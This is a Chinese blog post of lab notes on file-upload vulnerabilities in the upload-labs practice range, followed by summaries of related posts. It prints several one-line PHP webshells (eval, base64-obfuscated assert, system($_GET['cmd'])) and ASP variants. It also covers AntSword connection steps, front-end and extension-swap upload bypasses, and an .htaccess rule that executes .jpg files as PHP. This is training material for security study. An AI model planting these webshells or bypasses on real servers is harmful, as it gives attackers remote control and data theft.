一句话木马及文件上传。

最新推荐文章于 2025-06-19 23:27:38 发布
最新推荐文章于 2025-06-19 23:27:38 发布
阅读量5.6k 收藏 18
点赞数
CC 4.0 BY-SA版权
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhong_yan/article/details/121020898

前言,本博客只用于记录,不用于参考,并且并非真实的网站,而是搭建的靶场。

(要是学长看了我的博客的话,能不能告诉我咱学校的网站有没有后门什么的(划掉),传授一些经验。)

第一步:文件上传靶场upload-labs搭建

首先,启动PHP_study.(什么,不知道,不会上网查吗。zhong_yan博主,你可真是个废物)

 将upload-labs-master拖拽至WWW(PHP_study)目录(本博客只是记录,并非参考)

 之后启动,就上面的那张图片(阿帕奇就可以了)

访问靶场,便搭建成功了

ps:以后可以用docker搭建靶场(ctf里面做的题目就是用这个靶场搭建的) 

 第二步:一句话木马(webshell)原理

webshell就是以asp、php、jsp、或者cgj等网页形式存在的一种命令执行环境,也可以称其为一种网页后门。

下面是一句话木马(PHP语言编写(记得学))

<?php @eval($_post['pass']);?>

php代码需要使用<?php?>括起来,服务器才能将其识别为PHP代码

@符号表示不报错,即使执行错误,也不会报错

密码为pass

Eval()函数

我们用上面这个代码来黑一下搭建的靶场。

先把以上的代码放到这里面

 之后访问(自己搭建的靶场)。

然后打开蚁剑。添加(自己搭建的靶场)

 之后双击,就可以进入靶场的内部了

 

<?php $ant=base64_decode("YXNzZXJ0");$ant($_post['ant']));?>

3、中国蚁剑(AntSword)安装使用

GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器icon-default.png?t=L9C2https://github.com/AntSwordProject/AntSword-Loader在这里下载,根据自己的电脑进行下载。

 下载完解压即可寻找使用。

4、 文件上传前端绕过

 5、实战操练

 

 

 把onsubmit给干掉,就没人拦截提交了(emm)

访问图片链接,就成功了。 

zhong_yan
关注
文件上传句话木马getshell
qq_41620273的博客
12-25 5988
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 句话木马: 1.在phpstudy搭建的站点www目录下写入个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
【用句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1511
6.使用AntSword(中国蚁剑)管理工具连接句话,注意连接密码就是句话里的值。5.成功将句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
文件上传句话木马
kami_kami的博客
01-17 1392
先写好句话木马()(可先用记事本写,后将后缀改为php),想办法将这个php文件上传到需要入侵的网站,上传成功后,打开蚁剑,新建数据,将网站的URL网址粘贴进去,再填入密码(上面木马的[]中的1即为密码,可自己设定),后点测试连接,成功后点添加。然后双击添加的数据即可访问网站对应的服务器,在其中可找到flag(般在根目录下,根目录就是\)
文件上传漏洞,句话木马
最新发布
meiqianchifanle的博客
06-19 380
Webshell 是种恶意脚本或程序,通常以网页文件(如.php.jsp.asp.aspx等)的形式存在。它被攻击者上传或植入到目标 Web 服务器的网站目录中,目的是在服务器上建立个,从而实现对服务器的远程控制。
文件上传漏洞------句话木马原理解析
m0_69151365的博客
03-11 3596
这是个最简单的句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
上传文件注入(附带句话木马)
m0_50818626的博客
05-27 1096
发现order by 6的时候还是正常的,当order by 7 的时候却出现问题了,判断字段数有6个。跟上'之后 没有输出了,而跟上 -- qwe 将后面注释掉以后又恢复正常了,判断此处为注入点。这里的URL地址就是咱们上传的句话木马php文件的地址,密码就是我们POST上传的参数。>就是我们上传的句话木马啦。如上图所示,有很明显的传参地点,我们选择在id=13后面跟个'判断是否有注入点。到我们最关键的步了,我们在输出位上跟上以下语句。我们就可以对对方的数据库为所欲为啦。四、上传句话木马
上传漏洞(句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
qq_53058639的博客
03-16 2576
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每个知识点,我都有配套的视频讲解。
句话木马上传常见的几种方法
热门推荐
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
php句话木马连菜刀,如何基于菜刀PHP句话实现单个文件批量上传?
weixin_35741494的博客
03-09 2076
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临个问题,使用菜刀个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php句话为例来分析下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过句话木马来实现web服务器的文件管理的。下面是最常见...
文件上传+句话木马(图文学习笔记)
qq_43236906的博客
10-24 4565
文件上传+句话木马(学习笔记) 漏洞描述 文件上传漏洞是指些web应用程序中允许上传文本或其他指定资源到指定位置,上传漏洞顾名思义,就是攻击者上传了个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。(摘自百度搜索) 例如有个网站会出现以下的操作让其上传文件等,可利用上传文件过滤不严谨来插入木马等。 句话木马 以PHP举例 <?php @eval($_POST['muma']); ?> eval()函数表示括号内的语句字符串什么的全都
除了文件上传还有哪些方式可以写句话木马
qq_51553814的博客
11-29 2546
除了文件上传还有哪些方式可以写句话木马句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的定是比我更好 结合sql注入生成句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
上传句话木马拿shell教程
mad-coding Blog
03-21 1万+
0x00 前言 句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...
句话木马
qq_43814486的博客
04-22 2463
条件:1.有服务器的写入权限。2.知道服务器的地址。目的:将我们的句话木马插入到服务器的asp文件中。 例如:在服务器的地址里创建个叫virus.php文件里边放代码: <?php system($_GET['cmd'])?> 然后我们就可以通过URL去操控服务器的cmd了,例如访问: http://127.0.0.1/virus.php?cmd=ipconfig 相当于在服...
使用Weevely工具上传句话木马
一颗小松子.的博客
01-27 3315
Weevely在上传木马进行后渗透测试的过程中可用于模拟个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
上传漏洞-句话木马
Coisini的博客
05-30 8842
声明:为什么又写篇关于句话木马,对,我第次没写明白,直写了句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改下,这次精写! 上传漏洞-句话木马 讲述内容: 句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 句话木马 句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入句话木马,然后你就可以在本地通过...
句话木马——上传+绕过
m0_75236662的博客
06-02 2510
3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面。1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(句话木马上传点)上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭。这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败。2.调出属性,修改为IP,应用后确定。访问上传路径,上传成功。
文件上传漏洞(句话木马)(学习笔记)
2401_86737011的博客
10-16 1876
将这个按键打开,现在就处于抓包状态了,浏览器发出的数据包都会被我们截获,然后我们可以对数据包进行修改,现在可以去点击提交了。由于管理员对文件上传没有进行安全过滤操作,我们可以通过文件上传漏洞来上传些危险的东西来获得服务器的控制权。发现报错了,说明.php后缀是不能上传的,那么我们可以把他改为.png上传,然后在burp中抓包修改。然后先不要点提交,因为上传png文件上去我们不能使用里面的句话木马,我们现在打开burp来抓包。发现成功上传了我们的句话木马,现在对方的服务器里就有我们的木马文件了。
中国蚁剑简介
m0_73721944的博客
03-28 2461
句话木马:在很多的渗透过程中,渗透人员会上传句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此。中国蚁剑和中国菜刀类似,是款webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。(1)php的代码要写在
上传句话木马Upload-Labs 1-5全图
4pri1
03-20 507
关 上传句话木马Upload-Labs 1-5全图 第关 客户端利用js检测,检测的通常是后缀名,只要在bp改回后缀即可绕过 蚁剑连接即可 第二关 服务端mime类检测,检测的是content-type的内容,所以绕过可以在bp修改content-type的值image/gif 放包,蚁剑连接即可 第三关. 用第关的绕过方式就不行了 三种方法 通过上传不受欢迎的php扩展来绕过黑名单。例如:pht,phpt,phtml,php3.
句话木马php文件上传
01-03
### PHP 实现句话木马文件上传的技术细节 #### 技术实现方式 在Web应用程序的安全防护不足的情况下,攻击者可能利用特定的配置漏洞来上传并执行恶意脚本。对于PHP环境而言,种常见的技术手段涉及创建极简的句话木马,其核心在于能够接收远程指令并通过`eval()`函数动态解释执行这些命令。 下面展示了种典型的句话木马形式: ```php <?php $x=$_POST['z']; @eval("$safedg = $x;"); ``` 此代码片段会捕获来自HTTP POST请求中的参数`z`的内容,并将其赋给变量$x;随后调用`@eval()`方法试图将$x所指向字符串当作PHP语句去运行[^3]。 #### 利用`.htaccess`绕过文件类型限制 当目标服务器允许用户自定义Apache配置时(即支持`.htaccess`),则可以通过修改此类文件使得某些非预期类型的文件也能按照PHP的方式处理。例如,在`.htaccess`内加入如下规则可以让JPG图片格式被视作PHP脚本来解析: ```apacheconf <FilesMatch ".*\.jpg$"> SetHandler application/x-httpd-php </FilesMatch> ``` 这意味着如果存在名为`shell.jpg`的实际图像文件中含有隐藏的PHP代码,则它现在可以在浏览器访问时被执行[^2]。 #### 安全风险分析 上述做法带来了严重的安全隐患,具体表现在以下几个方面: - **权限提升**:旦成功部署这样的木马程序,攻击者就能获得对受感染系统的完全控制权。 - **数据泄露**:借助于植入的后门机制,敏感信息可能会轻易被盗取。 - **服务中断**:恶意软件还可能导致网站无法正常运作甚至整个网络瘫痪。 - **法律后果**:非法入侵他人计算机信息系统属于违法行为,应承担相应的法律责任。 为了防止这类攻击的发生,建议采取措施强化应用层面上的安全策略,比如严格审查上传至服务器端的所有资源,以及合理调整PHP配置选项如关闭潜在危险的功能等[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值